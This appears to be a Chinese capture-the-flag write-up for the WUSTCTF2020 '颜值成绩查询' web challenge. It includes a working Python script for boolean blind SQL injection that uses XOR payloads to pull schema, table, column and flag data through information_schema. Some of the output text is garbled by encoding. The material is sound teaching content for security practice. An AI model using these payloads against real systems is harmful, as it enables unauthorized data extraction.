[WUSTCTF2020]颜值成绩查询
首页长这样
通过stunum传递查询
/?stunum=<num>
/?stunum=1
Hi admin, your score is: 100
/?stunum=2
Hi åŒå‡»è€é, your score is: 666
/?stunum=3
Hi 别fuzz了, your score is: ä½ å°±ä¸ä¼šè¾“个å¦å·?
/?stunum=4
Hi 哦数æ®å, your score is: AISæˆå‘˜çš„æ•°æ®
逐渐魔法起来力
猜测是不是存在sql注入
/?stunum=0^1
Hi admin, your score is: 100
/?stunum=0^0
student number not exists.
尝试直接布尔盲注
import requests
import time
import sys
url = "http://xxx.node4.buuoj.cn:81"
fmt = '0^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)'
false_re = 'exists'
for i in range(0, 100):
l = 0
r = 127
while l < r:
mid = (l + r) // 2
payload = fmt % (i, mid)
params = {'stunum': payload}
response = requests.get(url, params)
time.sleep(0.1)
if response.text.find(false_re) >= 0: # mid >= ans
r = mid
else: # mid < ans
l = mid + 1
print(chr(l), end='')
sys.stdout.flush()
information_schema,ctf
fmt = '0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'ctf\')),%d,1))>%d)'
flag,score
fmt = '0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'flag\')),%d,1))>%d)'
flag,value
fmt = '0^(ord(substr((select(group_concat(flag))from(ctf.flag)),%d,1))>%d)'
flag
fmt = '0^(ord(substr((select(group_concat(value))from(ctf.flag)),%d,1))>%d)'
flag{808357e6-c9d9-48c6-84f8-23e18ec19981}
#Web #SQL注入 #布尔盲注